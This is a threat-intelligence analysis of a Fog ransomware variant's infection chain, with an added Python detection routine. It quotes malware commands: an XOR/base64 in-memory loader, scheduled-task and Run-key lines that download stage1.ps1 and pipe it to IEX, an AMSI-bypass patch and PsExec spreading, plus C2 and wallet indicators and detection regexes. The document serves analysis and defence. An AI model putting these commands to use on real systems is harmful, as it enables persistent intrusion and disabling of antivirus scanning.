A recent analysis of newly discovered payloads linked to the DOGE Big Balls ransomware operation reveals a complex infection chain combining open-source tools, kernel-level exploits, and psychological warfare. This variant of the Fog ransomware employs a multi-phase approach to establish persistence, escalate privileges, and propagate across networks, with attackers frequently updating their payloads to evade detection.
Infection chain and persistence mechanisms
The campaign begins with an MSI installer (payload.msi) that executes a heavily obfuscated PowerShell script (wix.ps1). The script uses single-byte XOR and base64 encoding to hide its intent:
```powershell
# Decoded snippet from wix.ps1
$xorKey = 0x3F                                   # single-byte XOR key
$encodedScript = "BASE64_ENCODED_PAYLOAD"        # base64 text of the XOR-encoded stage
$decodedBytes = [System.Convert]::FromBase64String($encodedScript)
$decryptedScript = $decodedBytes | ForEach-Object { $_ -bxor $xorKey }   # undo the XOR byte by byte
iex ([System.Text.Encoding]::ASCII.GetString($decryptedScript))         # run the recovered script in memory
```
This script creates an LNK shortcut (EdgeAutoUpdater.lnk) in the Windows Startup directory to execute stage1.ps1 on login. For administrative access, it also deploys a Scheduled Task:
```cmd
schtasks /create /tn "EdgeAutoUpdaterTask" /tr "powershell -ExecutionPolicy Bypass -Command iwr -Uri [REDACTED]/stage1.ps1 | IEX" /sc once /st 00:00
```
Privilege escalation and lateral movement
The stage1.ps1 script orchestrates credential dumping via Mimikatz and Rubeus, while exploiting CVE-2015-2291 through the vulnerable iQVW64.sys driver. Attackers use the BYOVD (Bring Your Own Vulnerable Driver) technique to load a custom kernel tool (ktool.exe), granting SYSTEM-level access.
Key tactics include:
- AMSI bypass: the amsibypass.ps1 script patches the AmsiScanBuffer function to disable antivirus scans:
  ```text
  mov eax, 80070057
  ret
  ```
- Lateral movement: the worm.ps1 script deploys PsExec to propagate across Active Directory environments:
  ```cmd
  reg add HKLM\...\Run /v UpdaterService /d "powershell -w hidden iwr [REDACTED]/stage1.ps1 | IEX"
  psexec \\[TARGET] -c C:\Windows\Temp\PsExec64.exe
  ```
- ZeroTier integration: the ztinstall.ps1 script joins infected machines to a private ZeroTier network (ID: e3918db483e97c3f), enabling persistent remote access.
Monetization and anti-analysis
Beyond ransomware deployment, attackers leverage:
- Cryptocurrency mining: the xmrigstart.ps1 script executes an XMRig miner targeting the Monero wallet 8BSDR3NXiScgvyBshu8qunNdqURqMocHdJ.
- Dynamic payload updates: payloads hosted on Netlify are frequently rotated, with observed shifts from Meterpreter loaders to Fog ransomware binaries.
Defensive recommendations
- Monitor PowerShell activity: flag suspicious command chains like `iwr | IEX` or AMSI bypass patterns.
- Restrict driver loading: block vulnerable drivers (e.g., iQVW64.sys) via the Microsoft Vulnerable Driver Blocklist.
- Analyze scheduled tasks: hunt for tasks with non-standard names (e.g., EdgeAutoUpdaterTask) or PowerShell execution.
- Block Netlify domains: use DNS filtering to prevent connections to `*.netlify.app` unless explicitly whitelisted.
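As an added example (not from the article or from Netskope's published rules), the following Python triage routine turns the monitoring recommendations above into concrete checks that can be run over PowerShell 4104 ScriptBlockText or process command lines; it also covers the Startup .lnk, scheduled-task and ZeroTier behaviours described earlier. The rule set, rule names, the placeholder host example.invalid and the sample inputs are constructed assumptions.

```python
import re

# Heuristics derived from the tradecraft described above: download cradle,
# XOR+base64 loader, AmsiScanBuffer patch, Startup-folder .lnk, schtasks
# with -ExecutionPolicy Bypass, ZeroTier join. Constructed for illustration;
# these are not Netskope's published YARA rules.
RULES = {
    "download_cradle": re.compile(
        r"\b(iwr|invoke-webrequest|irm|invoke-restmethod)\b[^|;\n]*\|\s*(iex|invoke-expression)\b",
        re.I),
    "xor_b64_loader": re.compile(
        r"FromBase64String\b.*-bxor.*\b(iex|invoke-expression)\b", re.I | re.S),
    "amsi_patch": re.compile(r"AmsiScanBuffer|80070057", re.I),
    "startup_lnk": re.compile(r"\\Programs\\Startup\\[^\\\n]+\.lnk", re.I),
    "schtask_ps_bypass": re.compile(
        r"\bschtasks\b.*/create\b.*-ExecutionPolicy\s+Bypass", re.I),
    "zerotier_join": re.compile(r"zerotier[^\n]*\b[0-9a-f]{16}\b", re.I),
}

def scan_scriptblocks(texts):
    """Map index -> sorted rule names for every text that trips at least one rule.

    Feed it ScriptBlockText from PowerShell 4104 events or raw process command
    lines; benign text yields no entry.
    """
    hits = {}
    for i, text in enumerate(texts):
        matched = sorted(name for name, rx in RULES.items() if rx.search(text))
        if matched:
            hits[i] = matched
    return hits

# Constructed sample inputs. example.invalid is a placeholder host; the network
# ID and task name are the ones quoted in the article.
SAMPLE_TEXTS = [
    'schtasks /create /tn "EdgeAutoUpdaterTask" /tr "powershell -ExecutionPolicy Bypass '
    '-Command iwr -Uri http://example.invalid/stage1.ps1 | IEX" /sc once /st 00:00',
    '$d=[Convert]::FromBase64String($e); $p=$d|%{$_ -bxor 0x3F}; '
    'iex([Text.Encoding]::ASCII.GetString($p))',
    'Get-ChildItem C:\\Logs | Where-Object { $_.Length -gt 1MB } | Remove-Item',  # benign
    'patch AmsiScanBuffer: mov eax,0x80070057 ; ret',
    'zerotier-cli join e3918db483e97c3f',
    'Copy-Item u.lnk "$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\EdgeAutoUpdater.lnk"',
]

if __name__ == "__main__":
    for idx, names in scan_scriptblocks(SAMPLE_TEXTS).items():
        print(f"[{idx}] {', '.join(names)}")
```

The patterns are deliberately loose hunting heuristics; tune them against your own baseline before alerting on them.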
This campaign underscores the blurred line between ransomware operations and advanced persistent threats (APTs), with attackers investing in both technical sophistication and infrastructure agility. The use of humor (e.g., “DOGE BIG BALLS”) and political references in ransom notes further complicates attribution, a trend likely to persist in 2025’s threat landscape.
Indicators of Compromise (IOCs):
- SHA256: [Redacted – see Netskope GitHub repository]
- C2 URLs: gentle-chebakia-da1172.netlify.app, http://172.22.173.171:80/a
- ZeroTier Network ID: e3918db483e97c3f
For full YARA rules and script samples, refer to Netskope’s GitHub repository.